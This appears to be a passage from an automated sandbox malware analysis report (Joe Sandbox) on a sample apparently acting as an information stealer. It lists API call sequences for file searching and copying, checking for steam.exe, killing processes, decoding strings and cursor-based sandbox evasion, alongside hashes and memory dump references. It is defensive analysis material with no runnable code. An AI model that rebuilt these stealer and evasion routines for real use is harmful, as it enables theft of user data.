                                                                                                                                                                                                                                                          • API ID: File$lstrcpy$Find$CloseCreatelstrcat$AllocCopyDeleteFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitlstrlen
                                                                                                                                                                                                                                                          • String ID: \*.*
                                                                                                                                                                                                                                                          • API String ID: 2055012574-1173974218
                                                                                                                                                                                                                                                          • Opcode ID: 7d51386eea73b3ce7fdd049b0e5812ae9a062698b10364b49e76ff627a86f0c4
                                                                                                                                                                                                                                                          • Instruction ID: 6d1e5641952857588d0d2cdf8e3d1c9eaff09dcb67d391654026601db250c6ac
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d51386eea73b3ce7fdd049b0e5812ae9a062698b10364b49e76ff627a86f0c4
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30E1833290016D9BCF60EB25DD46ADDB375AF44305F4144E1AA0877226DBB97F8AAFC0
                                                                                                                                                                                                                                                          Function 00FEB719 Relevance: 13.7, APIs: 9, Instructions: 217fileCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
                                                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,01016458,0101582F,?,?,?), ref: 00FEB791
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,0101645C), ref: 00FEB7B2
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,01016460), ref: 00FEB7CC
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,01016464,?,01015832), ref: 00FEB859
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 00FEB8BA
                                                                                                                                                                                                                                                            • Part of subcall function 00FF073C: lstrcpyA.KERNEL32(00000000,?,?,00FE1CF7,?,00FF7504), ref: 00FF075B
                                                                                                                                                                                                                                                            • Part of subcall function 00FEAD1F: CopyFileA.KERNEL32(?,?,00000001), ref: 00FEADC4
                                                                                                                                                                                                                                                          • FindNextFileA.KERNEL32(?,?), ref: 00FEBA25
                                                                                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 00FEBA39
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3801961486-0
                                                                                                                                                                                                                                                          • Opcode ID: 14e674afb6e9b5f10118622e5d9240fa2a3fada7c665ce4214bb5f4dad744dae
                                                                                                                                                                                                                                                          • Instruction ID: eee92c33a19db6e9fcf66bd372f7abe05eea9e37729d1f5655a8c5fcf03b6919
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14e674afb6e9b5f10118622e5d9240fa2a3fada7c665ce4214bb5f4dad744dae
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97811A3290055C8BCB60FB35EC46ADD7778AF04310F8145A1AE48B3216EB79AE49EFD1
                                                                                                                                                                                                                                                          Function 00FF287A Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39processCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00FF2884
                                                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00FF28A6
                                                                                                                                                                                                                                                          • Process32First.KERNEL32(00000000,00000128), ref: 00FF28B6
                                                                                                                                                                                                                                                          • Process32Next.KERNEL32(00000000,00000128), ref: 00FF28C8
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00FF28DA
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00FF28F3
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                          • String ID: steam.exe
                                                                                                                                                                                                                                                          • API String ID: 1799959500-2826358650
                                                                                                                                                                                                                                                          • Opcode ID: 59e16966234c636198ad156ac228ca2d305017bfaf873b907e36991a0411e197
                                                                                                                                                                                                                                                          • Instruction ID: 12e802c199a70a7654b785d1593c0d911f85a936e6d09ab4583338249bf56bed
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 59e16966234c636198ad156ac228ca2d305017bfaf873b907e36991a0411e197
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B901287090122D9FEB719B64DC08BEEB7B8AF45350F4081A6A649E3194DB348F41DF20
                                                                                                                                                                                                                                                          Function 00FE17FD Relevance: 12.1, APIs: 8, Instructions: 68sleepthreadCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • OpenInputDesktop.USER32(00000000,00000001,80000000), ref: 00FE1813
                                                                                                                                                                                                                                                          • SetThreadDesktop.USER32(00000000), ref: 00FE181A
                                                                                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00FE182A
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 00FE183A
                                                                                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00FE1849
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00002710), ref: 00FE185B
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 00FE1860
                                                                                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00FE186F
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CursorSleep$Desktop$InputOpenThread
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3283940658-0
                                                                                                                                                                                                                                                          • Opcode ID: 9649ffa881f5be0df8615e40b5f4a1b9755aa62a4f14d5c37dd4c5614dc9f124
                                                                                                                                                                                                                                                          • Instruction ID: d0fdc591243f614103eda825904eb6de451e29060a40800ddd862b081269ae41
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9649ffa881f5be0df8615e40b5f4a1b9755aa62a4f14d5c37dd4c5614dc9f124
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F113D31E0024AEBDB20DBA6CD49BBE7BB8BF00312F244565D505A2090D774AB40EB60
                                                                                                                                                                                                                                                          Function 00FF29DE Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,10000000), ref: 00FF2A0A
                                                                                                                                                                                                                                                          • Process32First.KERNEL32(00000000,00000128), ref: 00FF2A1A
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,?), ref: 00FF2A33
                                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00FF2A46
                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00FF2A55
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00FF2A5C
                                                                                                                                                                                                                                                          • Process32Next.KERNEL32(00000000,00000128), ref: 00FF2A6A
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00FF2A75
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2696918072-0
                                                                                                                                                                                                                                                          • Opcode ID: 5313a131151334090f75a6deff9f392a3bd26d638c39d7490dae5eaa91943a10
                                                                                                                                                                                                                                                          • Instruction ID: c7bf04179519a6494a666ce8e4770c46a312abb668dcab552bccecebd607a979
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5313a131151334090f75a6deff9f392a3bd26d638c39d7490dae5eaa91943a10
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70114831A0121DAFDB719F64EC49BEE7BB8AF49B11F008095FB05E2144DB789A459B50
                                                                                                                                                                                                                                                          Function 00FEA911 Relevance: 9.1, APIs: 6, Instructions: 94stringencryptionCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FEA94E
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,00FEAC20), ref: 00FEA969
                                                                                                                                                                                                                                                          • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 00FEA971
                                                                                                                                                                                                                                                          • _memmove.LIBCMT ref: 00FEA9F4
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(0101580E,01015812,?,00000000,00000000,00000000,00000000,00000014,?,00FEAC20), ref: 00FEAA1E
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(0101580E,01015813,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,00FEAC20), ref: 00FEAA34
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcat$BinaryCryptString_memmove_memsetlstrlen
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 943939369-0
                                                                                                                                                                                                                                                          • Opcode ID: 621ca69d8928ee1d808808fa292a5cb44b118f4642f06571e579f8a4a9939856
                                                                                                                                                                                                                                                          • Instruction ID: 320f3f16935b5638c642e0db2ad08129719a052a0b67b75097d854e49414e3bc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 621ca69d8928ee1d808808fa292a5cb44b118f4642f06571e579f8a4a9939856
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7318FB1D0021AAFDB219F65EE849FEB7BCAF18700F4040B6F509E2144D7785E449F62
                                                                                                                                                                                                                                                          Function 00FF2951 Relevance: 9.0, APIs: 6, Instructions: 37processCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00FF295B
                                                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00FF297A
                                                                                                                                                                                                                                                          • Process32First.KERNEL32(00000000,00000128), ref: 00FF298A
                                                                                                                                                                                                                                                          • Process32Next.KERNEL32(00000000,00000128), ref: 00FF299C
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 00FF29AE
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00FF29C2
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
